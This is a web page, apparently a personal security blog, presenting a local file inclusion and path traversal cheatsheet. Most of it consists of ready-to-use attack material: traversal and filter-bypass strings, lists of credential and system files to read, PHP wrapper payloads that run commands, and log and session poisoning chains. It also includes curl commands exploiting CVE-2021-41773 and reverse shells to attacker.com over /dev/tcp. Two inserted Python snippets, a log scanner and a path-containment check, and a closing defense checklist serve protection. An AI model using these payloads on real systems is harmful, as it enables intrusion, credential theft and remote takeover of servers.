LFI & Path Traversal Cheatsheet: File Inclusion to RCE | Tağmaç - root@Tagoletta:~#

LFI & Path Traversal Cheatsheet: File Inclusion to RCE

Thu May 28 2026

Category: Cheatsheet

Scope: LFI from file read through full RCE. Includes PHP-specific techniques, filter bypass, and log/session poisoning chains.


Basic Path Traversal

../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd

URL Encoded

..%2fetc%2fpasswd
..%2F..%2Fetc%2Fpasswd
%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/etc/passwd
..%252fetc%252fpasswd          (double URL encode)
..%c0%afetc%c0%afpasswd        (unicode overlong encoding)
..%c1%9cetc%c1%9cpasswd

Null Byte (PHP < 5.3.4)

../../../etc/passwd%00
../../../etc/passwd%00.jpg
../../../etc/passwd\0

Filter Bypass Tricks

....//....//....//etc/passwd         (double dot-slash)
....\/....\/....\/etc/passwd
....//..//..//etc/passwd
..%2F..%2F..%2Fetc%2Fpasswd
..././..././..././etc/passwd
/var/www/../../etc/passwd            (absolute path traversal)
php://filter/convert.base64-encode/resource=../../etc/passwd
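A defender-side example, added here and not part of the original cheatsheet, that applies the same decoding steps a lax server stack would (repeated percent-decoding, overlong UTF-8, backslash folding) to query parameters in access-log lines and flags the traversal, wrapper and null-byte forms listed above; the log format and the sample lines are constructed:

```python
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed Apache-style access-log lines (made up for this example).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=....//....//etc/passwd HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 4096',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?page=..%c0%afetc%c0%afpasswd%00.jpg HTTP/1.1" 200 1024',
]

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD|PUT) (\S+) HTTP/')
WRAPPER_RE = re.compile(r'^(?:php|data|phar|zip|expect|file|ftp|https?)://', re.I)

def normalize(value):
    """Percent-decode until stable (%252f -> %2f -> /), map the overlong UTF-8
    forms of '/' (%c0%af) and '\\' (%c1%9c) to a real slash, fold backslashes."""
    raw = value.encode("utf-8")
    prev = None
    while prev != raw:
        prev, raw = raw, unquote_to_bytes(raw)
    raw = raw.replace(b"\xc0\xaf", b"/").replace(b"\xc1\x9c", b"/")
    return raw.decode("utf-8", errors="replace").replace("\\", "/")

def classify(value):
    """Return why a decoded value looks like LFI, or None if it looks benign.
    '....//' still contains '../' after decoding, so one test covers it too."""
    v = normalize(value)
    if "\x00" in v:
        return "null byte"
    if WRAPPER_RE.match(v):
        return "stream wrapper"
    if "../" in v or v.startswith("/"):
        return "path traversal"
    return None

def scan_log(lines):
    """Return (client_ip, parameter, reason) for every suspicious query parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for pair in urlsplit(target).query.split("&"):
            name, _, value = pair.partition("=")
            reason = classify(value)
            if reason:
                hits.append((ip, name, reason))
    return hits
```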

Linux Target Files

System

/etc/passwd
/etc/shadow                          (requires root)
/etc/group
/etc/hosts
/etc/hostname
/etc/resolv.conf
/etc/issue
/etc/motd
/etc/crontab
/etc/cron.d/
/etc/cron.daily/
/etc/os-release
/proc/version
/proc/cmdline
/proc/mounts
/proc/partitions
/proc/meminfo
/proc/cpuinfo
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie

Process Information (via /proc/self)

/proc/self/environ               ← environment variables (may include secrets)
/proc/self/cmdline               ← current process command line
/proc/self/maps                  ← memory map (find loaded libs/paths)
/proc/self/fd/                   ← open file descriptors
/proc/self/fd/0                  ← stdin
/proc/self/fd/1                  ← stdout
/proc/self/fd/2                  ← stderr
/proc/self/cwd                   ← symlink to current working directory
/proc/self/exe                   ← symlink to running executable
/proc/self/status                ← process info
/proc/self/net/arp               ← ARP table (LAN discovery)
/proc/net/route                  ← routing table

Web Application Files

/var/www/html/index.php
/var/www/html/config.php
/var/www/html/wp-config.php          (WordPress)
/var/www/html/.env                   (Laravel / Node)
/var/www/html/sites/default/settings.php  (Drupal)
/var/www/html/application/config/database.php  (CodeIgniter)
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/usr/local/apache2/conf/httpd.conf
/usr/local/etc/nginx/nginx.conf

SSH & Credentials

/root/.ssh/id_rsa
/root/.ssh/id_ed25519
/root/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/home/user/.bash_history
/home/user/.bashrc
/home/user/.profile
/root/.bash_history

Logs (for Log Poisoning)

/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log          (RHEL/CentOS)
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/auth.log
/var/log/mail.log
/var/mail/root
/var/spool/mail/root

Windows Target Files

C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\drivers\etc\networks
C:\Windows\repair\sam
C:\Windows\repair\system
C:\Windows\repair\software
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
C:\Windows\System32\config\DEFAULT
C:\Windows\System32\config\SOFTWARE
C:\boot.ini
C:\inetpub\wwwroot\web.config
C:\inetpub\wwwroot\global.asa
C:\inetpub\logs\LogFiles\W3SVC1\
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\system32\sysprep\sysprep.xml
C:\sysprep\sysprep.xml
C:\sysprep.inf
C:\Users\Administrator\.ssh\id_rsa
C:\Users\<username>\AppData\Roaming\FileZilla\sitemanager.xml
C:\ProgramData\FileZilla Server\FileZilla Server.xml

PHP Wrappers

php://filter (Read source code)

php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=../../config.php
php://filter/convert.base64-encode/resource=/var/www/html/config.php
php://filter/read=string.rot13/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php

# Chain filters
php://filter/read=convert.iconv.utf-8.utf-16/convert.base64-encode/resource=index.php

php://input (RCE — POST body executed as PHP)

GET /index.php?page=php://input HTTP/1.1
...
<?php system('id'); ?>

# URL: ?file=php://input
# POST body: <?php system($_GET['cmd']); ?>

data:// (RCE — inline PHP)

?file=data://text/plain,<?php system('id');?>
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOz8+

phar:// (Deserialization)

?file=phar:///var/www/html/uploads/malicious.jpg/poc.txt
# Requires controlling a file that contains a PHAR archive

zip:// (Read within ZIP)

?file=zip:///var/www/html/uploads/shell.zip%23shell.php
# If file upload → ZIP upload → LFI via zip://

expect:// (RCE — if expect module enabled)

?file=expect://id
?file=expect://whoami
?file=expect://curl+http://attacker.com/shell.sh|bash

LFI to RCE Chains

Log Poisoning — Apache/Nginx Access Log

# Step 1: Inject PHP into User-Agent
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Step 2: Include the log
http://target.com/index.php?file=../../../../var/log/apache2/access.log&cmd=id

Log Poisoning — SSH Auth Log

# Step 1: Attempt SSH with PHP as username
ssh '<?php system($_GET["cmd"]); ?>'@target.com

# Step 2: Include auth log
http://target.com/index.php?file=../../../../var/log/auth.log&cmd=id

/proc/self/environ Poisoning

# Step 1: Inject PHP into HTTP header
GET / HTTP/1.1
User-Agent: <?php system('id'); ?>

# Step 2: Include environ
http://target.com/?file=../../../../proc/self/environ

Session File Poisoning

# Step 1: Create session with PHP in a parameter
# Visit: http://target.com/index.php?name=<?php system($_GET['cmd']); ?>
# Session stored in: /var/lib/php/sessions/sess_SESSIONID
#                 or: /tmp/sess_SESSIONID

# Step 2: Include session file
http://target.com/index.php?file=../../tmp/sess_PHPSESSID&cmd=id

PHP Session Upload Progress

# PHP 5.4+ — session.upload_progress.enabled = On
# Make POST with file upload AND PHP code in upload progress name

POST /index.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----

------
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

<?php system('id'); ?>
------
Content-Disposition: form-data; name="file"; filename="test.txt"

test
--------

Via phpinfo() + LFI Race

# phpinfo() shows tmp file path for uploaded files
# Race: include tmp file before PHP deletes it
# Tools: lfi-race-condition exploit scripts

Remote File Inclusion (RFI)

Requires allow_url_include = On (rarely enabled in modern PHP):

?file=http://attacker.com/shell.php
?file=https://attacker.com/shell.php
?file=ftp://attacker.com/shell.php
?file=\\attacker.com\share\shell.php     (Windows UNC)
?file=//attacker.com/shell.php

Wfuzz / Fuzzing Wordlists

# Path traversal sequences
wfuzz -w /usr/share/wfuzz/wordlist/Injections/Traversal.txt -u "http://target.com/?file=FUZZ"

# Common files
wfuzz -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://target.com/?file=FUZZ"

Real-World Examples

CVE / Incident               Year  Product                      Impact
CVE-2022-44877               2022  CentOS Web Panel (CWP7)      LFI → log poisoning → unauthenticated RCE
CVE-2021-41773               2021  Apache HTTP Server 2.4.49    Path traversal → RCE if mod_cgi enabled
CVE-2021-42013               2021  Apache HTTP Server 2.4.50    Incomplete fix for above → still exploitable
CVE-2018-12613               2018  phpMyAdmin                   LFI → RCE via session poisoning
Heartbleed (CVE-2014-0160)   2014  OpenSSL                      Memory read (not LFI, but similar arbitrary read concept)
ZipSlip                      2018  Multiple (Java, Go, JS)      Path traversal in ZIP extraction → overwrite arbitrary files

Example: CVE-2021-41773 — Apache Path Traversal + RCE

# Path traversal to /etc/passwd
curl -s --path-as-is "http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd"

# RCE via mod_cgi (if enabled)
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" \
  "http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

# Reverse shell
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; bash -i >& /dev/tcp/attacker.com/4444 0>&1" \
  "http://target.com/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"

Example: Log Poisoning → RCE (PHP App)

# Step 1: Inject PHP payload into User-Agent (written to access log)
curl -s http://target.com/ -A '<?php system($_GET["cmd"]); ?>'

# Step 2: Include the log via LFI
curl "http://target.com/index.php?page=../../../../var/log/apache2/access.log&cmd=id"
# Output: uid=33(www-data)

# Step 3: Reverse shell
curl "http://target.com/index.php?page=../../../../var/log/apache2/access.log&cmd=bash+-c+'bash+-i+>%26+/dev/tcp/attacker.com/4444+0>%261'"

Example: php://filter — Read Source Code

# Read wp-config.php without executing it
curl "http://target.com/?file=php://filter/convert.base64-encode/resource=wp-config.php" \
  | grep -o '[A-Za-z0-9+/=]\{100,\}' | base64 -d

# Output: DB_PASSWORD, AUTH_KEY, etc.

Example: HTB: Beep — LFI to Log Poisoning

# LFI found in /vtigercrm/index.php?module=...&action=...
# Step 1: Poison the mail log via SMTP
nc target.htb 25
EHLO hacker
MAIL FROM: <<?php system('id'); ?>>

# Step 2: Include mail log
curl "http://target.htb/vtigercrm/index.php?module=../../../../var/log/mail"
# Output: uid=0(root) — Asterisk runs as root!

Tools

# LFISuite
python lfisuite.py

# kadimus
./kadimus -u "http://target.com/?page=FUZZ"

# fimap
python fimap.py -u "http://target.com/?page=test"

# liffy
python liffy.py -u "http://target.com/?file=test"

Defense Checklist

  • Never pass user input directly to file inclusion functions (include(), require(), file_get_contents())
  • Use a whitelist of allowed filenames/paths
  • Disable allow_url_include and allow_url_fopen
  • Set open_basedir to restrict PHP file access
  • Run web server as low-privilege user
  • Disable PHP wrappers if not needed
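An added example, not from the original page, of the first two checklist items in Python: an allow-list resolver for fixed template names, and a containment resolver (the same idea open_basedir enforces) for apps that must accept a file name. The pages directory, file names and escaping symlink are constructed:

```python
import os
import tempfile

# Hypothetical allow-list: the user value is a key, never a path fragment.
ALLOWED_PAGES = {"home": "home.php", "about": "about.php"}

def resolve_allowlisted(page):
    """Strongest option: unknown keys are refused outright."""
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page")
    return ALLOWED_PAGES[page]

def resolve_contained(base_dir, user_path):
    """Canonicalise and require the result to stay under base_dir.
    realpath collapses '..' and follows symlinks, and os.path.join drops
    base_dir when user_path is absolute, so '../' chains, absolute paths and
    symlinks that point outside the tree all fail the commonpath test."""
    if "\x00" in user_path or "://" in user_path:
        raise ValueError("wrapper scheme or null byte rejected")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes base directory")
    return candidate

def demo():
    """Probe resolve_contained in a throwaway tree; True means the path was accepted."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        pages = os.path.join(tmp, "pages")
        os.mkdir(pages)
        open(os.path.join(pages, "home.php"), "w").close()
        # Constructed symlink that escapes the directory (realpath exposes it).
        os.symlink("/etc/hostname", os.path.join(pages, "link.php"))
        for probe in ("home.php", "sub/../home.php", "../../etc/passwd",
                      "/etc/passwd", "link.php", "php://filter/resource=home.php"):
            try:
                resolve_contained(pages, probe)
                results[probe] = True
            except ValueError:
                results[probe] = False
    return results
```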
